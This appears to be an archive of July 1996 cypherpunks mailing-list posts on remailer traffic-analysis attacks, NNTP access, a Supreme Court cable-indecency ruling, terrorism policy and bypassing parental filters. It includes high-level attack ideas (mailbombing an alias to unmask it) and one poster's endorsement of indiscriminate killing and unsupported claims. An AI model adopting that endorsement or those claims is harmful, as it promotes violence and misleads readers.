-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks ## Date: 07/02/96 03:35 pm ##
  Subject: Re: anonymous mailing lists ]

>Date: Fri, 28 Jun 1996 23:04:28 -0500 (CDT)
>From: ichudov@algebra.com (Igor Chudov @ home)
>Subject: Re: anonymous mailing lists

>How about this attack: suppose I want to find out who hides behind
>an alias MightyPig@alpha.c2.org and I have the ability to monitor
>all internet traffic. Then I simply start mailbombing that address
>and see whose account gets unusually high traffic volume.

Yes.  This is a simpler version.  The advantage of the attack I was
describing over this attack is that an attacker doesn't have to know
how to send messages to the recipient--just where the stream of
messages is originating.

>A nice, albeit quite expensive, way of pretection from traffic analysis
>is to create a mailing list (or a newsgroup) and forward all messages to
>all users of that mailing list or newsgroup. Of course, since messages
>are encrypted, only the recipients will be able to decrypt them.

The flaw here is that only a small number of people will be willing
to plow through any volume of messages at all, in order to
occasionally get a single readable message.  There are also some
potential problems with giving the right recipient a cheap way to
determine whether or not this message is for him, without giving
anyone else a cheap way to determine this.  (An application for
``Rabin for Paranoids,'' anyone?)

>This way the list of suspects is all subscribers of that list or
>newsgroup and there is no way to discriminate them.

If this is a small enough group, that may still be a problem.  And
the bandwidth and processing requirements are probably enough to
ensure that it's a small group.

>Instead of having messages to be sent to all recipients all the time,
>alpha.c2.org may be programmed so that it sends out every message not to
>only one recipient X, but to X and 20 other randomly selected people.

This makes the attack only a little harder.  If the other 20 are
selected randomly, then for a stream of many messages, only one
recipient will correlate properly with sender volume and timing.  If
it's the same 20 every time for a given receiver, then the attacker
will be able to narrow the recipient down to 20 people.  At that
point, he can use other techniques (wiretaps, black-bag jobs,
TEMPEST attacks, etc.) to make his final determination.

>	- Igor.

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMds0OUHx57Ag8goBAQFE8QP/ZWBP32mg2xdkcUrloFwruW+4L1bgY+Uk
CEGxngqarxQxTNAckF0vOzpbS5gtjrs6dlEOFIQGeEuF3UWxHeKUIoOejofBZ2vT
Htp/FT4x2xkfTFlgVE6GLyjE7bxK8DqfwH3ACAtbR4l+YwKQDNoInfpeFw0HKD40
jC/R8M7l0Lk=
=9uja
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Thu, 4 Jul 1996 17:34:38 +0800
To: lcs Remailer Administrator <cypherpunks@toad.com
Subject: Re: Wanted: NNTP posting access for remailers
Message-ID: <ae01118d05021004775d@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


I would be willing to give you permission to use news.infonex.net.

I will set it up for you tomorrow.

        -Lance

At 5:46 PM 7/3/96, lcs Remailer Administrator wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Would anyone out there be willing to give NNTP posting or transfer
>privileges to anon.lcs.mit.edu?
>
>Because of recent spams through mail2news@anon.lcs.mit.edu, I may
>loose my news posting privileges to the news server I have been using.
>Though I try to resolve all complaints I receive, other complaints
>have been sent to other postmasters in the domain, who don't seem to
>want to hear about these problems.
>
>If you run a news server and would like to help people posting
>anonymous messages, please consider allowing posts from
>mail2news@anon.lcs.mit.edu.  Ideally you would also be in a position
>to receive mail at some of the relevant postmaster aliases in your
>domain, and would not mind forwarding misdirected complaints to me so
>that I can deal with them.  Alternatively, if you are willing to give
>me "IHAVE" priviliges, I can possibly set things up with an initial
>"Path:" header that guarantees most complaints will go directly to me.
>
>Thanks,
>- -mix-admin@anon.lcs.mit.edu
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface
>
>iQCVAwUBMdsT70TBtHVi58fRAQHQ0QP/U3Jn7sL9+k3aUr+qw4WdDxef/lIeu3xO
>BwdO8zlNPavJgbxuunR81n011jGy80l7qnc+DpvtuEEQqszLMcMO/4zHw/VfVOY8
>08nxE8+IkF/FE66vJdnU7O3I1mIjtbF8ixcm9FOwqoehSLJB40tXy6wu6KV663TQ
>fmy/Gz5XDe8=
>=Gp4D
>-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 4 Jul 1996 16:33:54 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Net and Terrorism.
In-Reply-To: <ae0077da07021004d4c7@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960703233159.124I-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Jul 1996, Timothy C. May wrote:

> At 12:14 AM 7/4/96, snow wrote:
> >     Military troops can best be protected by 3 seperate methods:
> >     2) When they _are_ exposed, let them fight the fuck back. Rules of
> >        engagment are simple. When fired on, shoot to kill. If the shot
> >        comes from a building, take out the building. If from a crowd,
>                                 ^^^^^^^^^^^^^^^^^^^^^^
> "Colonel, the mission was accomplished. Apparently the sniper was firing
> from the 34th floor, so we simply took out the building. There was minor
> collateral damage, of course."

	I guess that part of the problem is that I was in the military, 
and while I was never actually under fire, there was always the possibility,
and after hereing (from people who where there) the silly ass ROE, let's 
just say that when some one is trying to kill you it is nice to be able 
to do something about it. 
	There is something to the theory of peer pressure. I would maintain 
that there is a difference between responding to immediate threats and   
long term supression. 

> Such overreaction to terrorist events is often precisely what a terrorist
> wants, as I've explained a couple of times.

	Sometimes the terrorists are relying on exactly the opposite, a lack
of immediate reaction. This makes the government look impotent. 

> >> >A third option is quite simply to buy as much of it as possible.
> >> No, wouldn't work. As with the "War on (Some) Drugs," all this does is
> >> raise the price a bit, actually making it a more tempting market for many
> >> to get into.
> >
> >        If the US were to offer Russia $3 billion (or whatever)
> >in a one time take it or leave it for their entire chemical weapon stock,
> >it might get the soviet shit off the market. The nuclear stuff is a little
> >easier to store (I think) and it would be a harder sell.
> 
> >        I agree tho' that it isn't possible to buy out the market.
> 
> Then why do you float ideas such as buying out the Soviet arsenal if you
> think it isn't possible?

     Market v.s. Arsenel. Difference between buying a car dealership and 
buying the Big 6 Auto Makers. I was simply refering to removing the 
soviet stocks from the market. That would force the prices up a but, 
might get some private dealers into the market, but I wouldn't think that
this particular market is all that big. I may be wrong about the size of
the market.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 4 Jul 1996 17:47:31 +0800
To: cypherpunks@toad.com
Subject: Re: Message pools _are_ in use today!
Message-ID: <199607040656.XAA09167@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:25 PM 7/3/96 -0700, Timothy C. May wrote:

>Someone mentioned the Ku-band dishes that are used by PageSat (or whatever
>it is now called....). My DSS system, which is technically a Ku-band
>receiver, has a digital i/o connector of some sort on the back, and it is
>rumored that this will someday be available for PageSat-like uses. (I have
>a feeling this may be years off, for admin reasons if not technical
>reasons.)

As I understand it, the DSS broadcast (unlike older C-band units) consists 
of a single digital stream which contains the highly compressed (MPEG?) data 
representing all channels.  Being compressed, the data rate needed per 
channel varies  with the scene and the rate it changes.  Even if you add up 
a large number of these statistically-varying channels, you'll still get a 
fairly wide variation in the needed bit rate per second.   The system must 
have a substantial amount of headroom to protect against occasional times 
when many channels need a lot of bits, headroom that is mostly not being 
used, most of the time.  If this is correct, then most of this headroom 
should be available to piggybacked data traffic on a "space-available" 
basis.  Probably tens of megabits per second.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 4 Jul 1996 12:05:37 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: WSJ: Cable Ruling may Portend Internet Regulation
Message-ID: <199607040046.RAA08830@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



WSJ 01 Jul 96

Cable Ruling May Portend Internet Content Restrictions

What looks at first glance like a Supreme Court victory for free
expression in cable television could turn out to be a First Amendment
quagmire encouraging restrictions on the Internet.

That's the view some constitutional experts are taking of a high court
ruling Friday that struck down parts of a 1992 law designed to curb
"indecent" programming on cable channels leased to local groups or set
aside for the public.

"It's a sweeping victory for legitimate First Amendment expression,"
declared Michael Greenberger, one of the attorneys who represented
public-access cable producers who challenged the law. Conservative
advocates on the other side of the case also claimed victory because  
one
part of the law was preserved. &quot;American families fighting to  
shelter young children from cable-television pornography won a major  
battle today as the Supreme Court upheld the right of private cable  
operators to screen pornographic programs," said Cathy Cleaver,  
director of legal studies at the Family Research Council.

But some liberals were less sanguine. The ruling "tastes sweet at  
first," said Prof. Laurence Tribe of Harvard Law School, "but it turns  
out to be a sugar-coated poison pill for the First Amendment." He  
argued that the reasoning in the court's main opinion, written by  
Justice Stephen Breyer, was highly cautious and pragmatic rather than  
sweeping. This approach could be used to permit aggressive regulation  
of the Internet if the government can show that the global computer  
network gives children access to indecent material, meaning material  
that depicts sexual activities or organs in a "patently offensive" way.

The Supreme Court produced six opinions but not one that commanded a  
majority; the vote counts were 6-3 and 5-4 to strike down two of the  
cable restrictions at issue, and 7-2 to uphold a third.

In a separate case last month, a special federal court in Philadelphia  
invalidated key parts of a 1996 law aimed at curbing indecent material  
on the Internet. The Clinton administration last week said it would  
appeal that ruling to the Supreme Court. The Philadelphia court relied  
on ringing First Amendment rhetoric to decry government interference  
with the Internet.

Justice Breyer's opinion on Friday was strikingly different in tone and  
method. He took great pains to underscore the seriousness of the  
government's concern about exposing children to adult programming and
explicitly rejected the sort of categorical legal analysis that looks  
with great skepticism at any restriction on the content of programming.

The trio of provisions at issue in the case were pushed by Republican  
Sen. Jesse Helms of North Carolina as last-minute amendments to a  
broader 1992 cable-regulation bill. They authorized cable-system  
operators to prohibit indecent programming on leased channels and  
public access stations reserved for educational and governmental use.  
If an operator chose to allow indecent programming on leased channels,  
the Helms amendments required the operator to "segregate" such  
programming from other offerings, block it and provide it only to  
customers who requested it in writing.

Supporters of the legislation said they were targeting leased-access  
programs in New York and elsewhere that feature hard-core pornography.  
The Supreme Court case arose from lawsuits filed by community-access
programmers who argued that the law would ban legitimate shows on sex
education, abortion and other topics that could be defined as indecent.  
(In the legal lexicon, indecent material receives some First Amendment
protection, whereas "obscene" material, defined as that which lacks any
social or artistic value, doesn't.)

In Friday's ruling, the high court by a 7-2 vote upheld a provision  
that encourages -- but doesn't require -- cable operators to prohibit  
indecent programming on leased access channels. There is plenty of  
evidence on those channels of pornographic material that lacks social  
merit and should be kept away from children, Justice Breyer said. The  
provision isn't overly broad, he added. Adults seeking racy shows can  
look to the larger commercial cable channels, where they are plentiful.

By a 6-3 vote, however, the court struck down the provision that
requires operators who choose to allow indecent programming to block it  
for all but those viewers who request it in writing. Justice Breyer  
questioned the need to force customers to disclose their viewing  
appetites, and he asserted that other, less intrusive means exist to  
tailor dissemination of adult material if it is to be provided. As  
examples, he pointed to a recently enacted requirement that commercial  
cable operators "scramble" or block stations dedicated to sexual  
material and another that obliges television manufacturers to install  
"V-chips" in televisions that can automatically identify and block  
sexual or violent programming. (The high court didn't rule formally on  
the constitutionality of these devices.)

Finally, by a 5-4 margin, the court struck down a measure that  
encourages cable operators to ban indecent material on public-access  
stations. There isn't much, if any, indecency on these channels, but  
the law threatens to cause censorship of controversial shows on health,
politics and art, Justice Breyer said.

Daniel Brenner, a lawyer with the National Cable Television  
association, said the group was pleased overall with the ruling because  
it left operators "with the ability to protect our customers as to  
leased access. We wish it had done the same for public access."

The Federal Communications Commission, which had defended the Helms
amendments, managed to find something to celebrate as well. The   
decision "reaffirms that the Supreme Court believes that caring about  
what kids see on television is a compelling government interest, and  
there are constitutionally permissible ways for government to act to  
protect kids," said FCC Chairman Reed Hundt. He added that the ruling  
"is also significant because it confirms that the government's  
definition of "indecency" is not unconstitutionally vague."

Only Justices John Paul Stevens and David Souter joined the Breyer  
opinion in full. Justice Sandra Day O'Connor dissented in part.  
Justices Anthony Kennedy and Ruth Bader Ginsburg would have struck down  
all of the challenged law. The court's most conservative wing -- Chief  
Justice William Rehnquist and Justices Antonin Scalia and Clarence  
Thomas -- would have upheld the entire law.

Contractors' Speech

In a pair of other First Amendment cases, the high court ruled 7-2 that  
independent government contractors can't be fired for expressing their  
views on public issues or for supporting the wrong candidate. In cases  
from Illinois and Kansas, the court said that contractors have roughly  
the same free-speech rights as public employees. Justice Scalia, joined  
by Justice Thomas, dissented from both decisions. "Favoritism," he  
wrote, "happens all the time in political life, and no one has ever  
thought that it violated -- of all things -- the First Amendment to the  
Constitution of the United States."  (Wabaunsee County, Kansas vs.  
Umbehr, O'Hare Truck Service Inc. vs. City of Northlake, Ill.)



--
Fuck off, Uncle Sam. Cyberspace is where democracy lives!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Thu, 4 Jul 1996 10:27:51 +0800
To: cypherpunks@toad.com
Subject: Re: The Net and Terrorism
In-Reply-To: <adfff6be050210047fa0@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.960704010920.1005A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Timothy C. May wrote:

> Basically, one of the things terrorists want to do is to provoke a
> crackdown by the ruling authorities, making things so bad that a
> counterrevolution occurs. They believe they will reap the rewards of
> such a counterevolution (or revolution, as it need not be "counter").

Examples of this are the bombing attacks on tourists in Egypt
and Turkey; classical terrorism where the victims are not really
participants in the political struggle (as opposed to volontarily
enlisted American soldiers in Saudi). The agenda here is to bring
down the economy by scaring away future tourists, making way for
an islamic revolution/a separate kurdish state.

Anyone been to Egypt lately?


Asgaard 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 4 Jul 1996 13:50:55 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
Message-ID: <ae0077da07021004d4c7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:14 AM 7/4/96, snow wrote:

>     Military troops can best be protected by 3 seperate methods:

>     2) When they _are_ exposed, let them fight the fuck back. Rules of
>        engagment are simple. When fired on, shoot to kill. If the shot
>        comes from a building, take out the building. If from a crowd,
                                ^^^^^^^^^^^^^^^^^^^^^^

"Colonel, the mission was accomplished. Apparently the sniper was firing
from the 34th floor, so we simply took out the building. There was minor
collateral damage, of course."

Such overreaction to terrorist events is often precisely what a terrorist
wants, as I've explained a couple of times.


>> You are essentially making my point, that the biggest danger of the current
>> responses to terrorism is that nations will turn to national terrorism and
>> police state tactics.
>
>        I missed that in your original post.

Well, go back and look for it. The clear point of my post was that the U.S.
should not adopt police state measures so as to reduce terrorism.


>> >A third option is quite simply to buy as much of it as possible.
>> No, wouldn't work. As with the "War on (Some) Drugs," all this does is
>> raise the price a bit, actually making it a more tempting market for many
>> to get into.
>
>        If the US were to offer Russia $3 billion (or whatever)
>in a one time take it or leave it for their entire chemical weapon stock,
>it might get the soviet shit off the market. The nuclear stuff is a little
>easier to store (I think) and it would be a harder sell.

As with "buying out" the coca crop in Peru, the poppy crop in Turkey, the
marijuana crop in the dozens of countries, etc., their motto is, obviously
enough, "we'll make more."

Again, the Sarin attack in Tokyo had nothing to do with former U.S.S.R. CBW
weapons. Chemical and biological agents are cheap to make, especially in
the quanties needed to kill only a few thousand people, and in the
non-battlefield delivery environment.

>        I agree tho' that it isn't possible to buy out the market.

Then why do you float ideas such as buying out the Soviet arsenal if you
think it isn't possible?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 4 Jul 1996 13:40:01 +0800
To: cypherpunks@toad.com
Subject: Re: The Net and Terrorism
Message-ID: <ae007b030802100492be@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:35 PM 7/3/96, Vladimir Z. Nuri wrote:
>TCM breaks a longstanding personal policy of never replying
>to my posts directly. (well, thanks.)  realize that my
>speculation on his position is largely associated with the
>vacuum of his continually refusing to discuss key points of his
>essays.

Check your mail logs, Larry, as I've replied to a couple of your posts in
the last several months. True, I delete most of your posts after glancing
at them briefly, but I do this with a lot of posts and posters.

>imagine that all the palestinians had good paying jobs, for example.
>how many of them would be into rock-throwing and terrorism?  of course their
>own attitudes make such a thing very difficult. they may not have any
>skills or reject a job even if offered one. I'm not saying such a thing
>is easy. the fact that it is so elusive is proof of how difficult such
>a thing is.

Your point being? After all, nothing we can do will give the Palestinians
such jobs...visit the Middle East and see the quagmire. Too many points to
make here, and I don't plan to debate utopian ideologies about making the
world a land of milk and honey. (I will tell you that there are relatively
few "good paying jobs" anywhere in the Arab world--look at the poverty of
Egypt, Yemen, Sudan, Morocco, and so on. Note that these countries are not
directly involved in the Israeli-Palestinian dispute, and yet not a single
one of these countries has so much as a primitive electronics production
facility, let alone true high tech facilities such as Israel has. You may
want to wave a magic wand and say "Yeah, but what if they did have such
jobs?," but this is pure fantasy, and not something I plan to waste time
debunking.)


>I do NOT believe that living in the world is a zero-sum game as you
>seem to suggest. your use of the term is very compelling. do you
>believe human life is always at the expense of other human life?

I made no such claims about the world being a zero-sum game.

(I made references to game theory, and used the term "game-theoretic," but
this is not at all the same thing as asserting anything about zero sum
games! I never mentioned zero sum games, positive sum games, or anything at
all about sums. You are carelessly setting up straw men and then knocking
them down.)

No real point in wading through the rest of your ramblings.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 4 Jul 1996 17:13:27 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: What remains to be done.
Message-ID: <199607040558.WAA07414@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: Black Unicorn <unicorn@schloss.li>
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from Black Unicorn <unicorn@schloss.li> 07/03/96 10:17pm -0400

	good "white paper."

	modularity is the key.  use of standardized encryption libraries 
    permitting user selection of one or more formats.

	message pools would be great from satellite channels --how do you 
    regulate (read this as "pay for") since someone must receive the messages to 
    uplink?  -otherwise you have the dropouts of USENET.

	user interface is the achilles heel for most programmers --the time is 
    spent making the code 'work.'  with the tools available which allow multi-
    platform development, the *functional* GUI should be done by someone who
    creates "artitstic" interfaces.

	I agree-- if encryption can be made so simple, and with a clean user 
    interface, it will be used by joe sixpack (who rarely likes uncle, anyway 
    --but for different reasons). once joe sixpack starts to use (probably 
    dropping his private keys...), then it is too pervasive to stop --even if 
    there are a few high level prosecutions.

	one of our greatest failings v/v encryption as a group (including 
    coderpunks) is we are satisfied with our access to encrytion. PGP is a 
    nusiance, and the instructions are not clear --so we experiment until we get 
    the results: on the command line.  

	our satisfaction makes us insular; we need to think in global terms --mass 
    marketing of a free product which will hold appeal for everyone.  encryption 
    is no different than the students in China --no, they do have it, but how long 
    can Father Deng (and his successors) hang on against technology and quest for 
    knowledge?

--
Fuck off, Uncle Sam. Cyberspace is where democracy lives!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 4 Jul 1996 17:15:08 +0800
To: tcmay@got.net
Subject: Re: Net and Terrorism.
Message-ID: <199607040558.WAA07424@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: tcmay@got.net
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from tcmay@got.net 07/04/96 03:22am -0700

= Date: Thu, 4 Jul 1996 03:22:42 -0700 
= To: cypherpunks@toad.com 
= From: tcmay@got.net (Timothy C. May) 
=  
= Subject: Re: Net and Terrorism. 
=  
= At 12:14 AM 7/4/96, snow wrote: 
=  
= >     Military troops can best be protected by 3 seperate methods: 
=  
= >     2) When they _are_ exposed, let them fight the fuck back. Rules of 
= >        engagment are simple. When fired on, shoot to kill. If the shot 
= >        comes from a building, take out the building. If from a crowd, 
=                                 ^^^^^^^^^^^^^^^^^^^^^^ 
=  
= "Colonel, the mission was accomplished. Apparently the sniper was firing 
= from the 34th floor, so we simply took out the building. There was minor 
= collateral damage, of course." 
= 

	unfortunately, that was a modus operandi which I commanded --e.g. if one 
    shoots, waste them all. fortunately, the U.S. SE Asia policies in "denied 
    zones" (we were never there) is no longer in vogue.  however, we will probably 
    see that again in parts of the world as many cultures do not have the basic 
    respect for life we do.  

	the first time you witness a small child begging for chocolate exploded by 
    a remote control pressed by her father, you understand --you do not 
    necessarily like it, it's just survival.

	and faced with a decision of giving up 'n' "friendlies" for 1000n, or even 
    more, to survive, I know where I stood, and still stand.  War is hell --and 
    terrorism is war, make no mistake about it.

	in "black" operations, priority 1 is survival, priority 2 is objective, 
    and accountability is generally not an issue (unless you are out of bounds).
 
= Such overreaction to terrorist events is often precisely what a terrorist 
= wants, as I've explained a couple of times. 
= 
	yes, but it is the press, not the commander, who makes the decision to 
    give the terrorist sympathy coverage.  basicly: exclude, by whatever means, 
    the press and eliminate the terrorists 15 minutes of fame. 
 
=  
= >> You are essentially making my point, that the biggest danger of the current 
= >> responses to terrorism is that nations will turn to national terrorism and 
= >> police state tactics. 
= > 
= >        I missed that in your original post. 
=  
= Well, go back and look for it. The clear point of my post was that the U.S. 
= should not adopt police state measures so as to reduce terrorism. 
= 
	no shit; in spades. if the U.S does adopt the police state tactics Bubba 
    is espousing, the U.S. will be faced with _real_ terror, not staged incidents 
    to justify the marial law, etc.  if the populace is already disenchanted, 
    absolute loss of freedom will stir to action some very unlikely participants 
    and partners in "brotherhood."
 
=  
= >> >A third option is quite simply to buy as much of it as possible. 
= >> No, wouldn't work. As with the "War on (Some) Drugs," all this does is 
= >> raise the price a bit, actually making it a more tempting market for many 
= >> to get into. 
= > 
= >        If the US were to offer Russia $3 billion (or whatever) 
= >in a one time take it or leave it for their entire chemical weapon stock, 
= >it might get the soviet shit off the market. The nuclear stuff is a little 
= >easier to store (I think) and it would be a harder sell. 
=  
= As with "buying out" the coca crop in Peru, the poppy crop in Turkey, the 
= marijuana crop in the dozens of countries, etc., their motto is, obviously 
= enough, "we'll make more." 
= 
	The U.S. spooks are still the single largest trafficers in drugs... 
 
= Again, the Sarin attack in Tokyo had nothing to do with former U.S.S.R. CBW 
= weapons. Chemical and biological agents are cheap to make, especially in 
= the quanties needed to kill only a few thousand people, and in the 
= non-battlefield delivery environment. 
=  
= >        I agree tho' that it isn't possible to buy out the market. 
=  
= Then why do you float ideas such as buying out the Soviet arsenal if you 
= think it isn't possible? 
= 
	U.S. cash has eliminated a lot of Soviet weapons, including, I believe    
    some chemical.  however, keep in mind: the obsolete, and expensive to 
    maintain, hardware predominated.  However, you will never be able to buy out 
    the religious terrorists --they are on a "mission."

	The Western world faces far more threat from fundamentalist religious 
    terrorists than it does from the Soviet Union, etc.

	There is no cure for the "revolutionary" terrorists --just death for their 
    own brand of glory.  If we do not even print their obit, there is no glory!
 
= --Tim May 
=  


--
Fuck off, Uncle Sam. Cyberspace is where democracy lives!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 4 Jul 1996 16:38:10 +0800
To: cypherpunks@toad.com
Subject: Re: Message pools _are_ in use today!
Message-ID: <ae00a6f8000210047475@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:27 PM 7/3/96, Andrew Loewenstern wrote:
>Deranged Mutant writes:
>>  Uploading can be gotten around by using anonymous remailers
>>  and mail-to-news gateways... although someone can tell if you
>>  send mail to anonymous mailers.
>
>Not if you run your own remailer!

Agreed. And if a remailer chain is long enough, the "someone can tell if
you send mail to anonymous mailers" is meaningless.

(In an ideally crypto-anarchic world, millions of messages are being sent
to anonymous remailers, and it is worth nothing to know that Subject A sent
a message to an anonymous remailer.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Thu, 4 Jul 1996 19:44:40 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <Pine.LNX.3.94.960703185604.153A-100000@gak>
Message-ID: <Pine.SUN.3.94.960704083858.14638B-100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Mark M. wrote:

> On Wed, 3 Jul 1996, David Rosoff wrote:
> > I've wondered .. could a creative child circumvent these filter programs
> If the child is creative enough, he will be able to boot DOS from a bootdisk
> and remove the line from config.sys that starts up the filtering software.

	Even more creative kids will find the Dos-based web browser
	that bypasses whatever is in the config.sys file, that is 
	supposed to prevent them from seeing those "naughty" websites.
	
        xan

        jonathon
        grafolog@netcom.com



	AOL coasters are unique, and colourful.  
		Collect the entire set. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 5 Jul 1996 02:54:25 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: Noise: Re: Those Evil Republicans
In-Reply-To: <31DBA835.6EEA4806@systemics.com>
Message-ID: <Pine.SUN.3.91.960704083413.2341A-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 4 Jul 1996, Gary Howland wrote:

> There are also several independent sovereign nations that have no control
> over their own currency (eg. Liechtenstein (the one you mentioned), Andorra,
> Monaco, Nauru, Marshall Islands, Micronesia and Pueto Rico)...

Don't forget Panama, Liberia, Tuvalu, Turks & Caicos, etc. 
Printing one's own money does not a sovereign nation make.

> First of all, "parasitic" is a very derogatory term to apply to these
> nations.  They are no more parasitic than out of town supermarkets.

Correct.  While the US unsuccessfully tries to play policeman 
for the world, other countries are far more successful in being
the bankers, playgrounds, pharmaceutical manufacturers and
distributors, etc. for the world.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberEyes <cyberia@cam.org>
Date: Fri, 5 Jul 1996 00:57:33 +0800
To: cypherpunks@toad.com
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <31DA7000.6239@vail.tivoli.com>
Message-ID: <Pine.GSO.3.94.960704095934.23092B-100000@Stratus.CAM.ORG>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Mike McNally wrote:

> During that afternoon of Internet fun, Mark clicks the mouse and
> follows a hyperlink link to a web site filled with nasty objectionable
> anti-family morally corrosive filth.  Mark and Mathew run home in
> tears to their parents and tell all about the nightmare they've
> experienced.
> 
> I wonder whether the Christians would be able to successfully sue
> the Simpsons on some sort of "corruption of a minor" deal?  Indeed,
> couldn't it even be possible that some local prosecutor might find
> the Simpsons criminally involved?

	Depending on whether the information they accessed was
pornographic, yes they could be. I'm not a lawyer, but I know it's illegal
for minors to look at pornography.

Ryan A. Rowe - Montreal, Quebec        /Seeking Internet-related job!/ 
aka CyberEyes, Rubik'S Cube              I will relocate _ANYWHERE_.

Tel. -> +1-514-626-0328                |                 __o         o
E-Mail -> cyberia@cam.org              |               _ \<_        <\
WWW -> http://www.cam.org/~cyberia     | __/\o_       (_)/(_)       />
IRC -> #CAli4NiA, #Triathlon, #Surfing |
FTP -> ftp.cam.org /users/cyberia      |  swim          bike       run

          Read my C.V. at http://www.cam.org/~cyberia/resume-e.html 
           "In lieu of experience, I have a willingness to learn."

             "Everyone has their day, mine is July 15th, 1998."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kyleb@juno.com (Kyle A Beltle)
Date: Fri, 5 Jul 1996 01:28:33 +0800
To: cypherpunks@toad.com
Subject: PGP
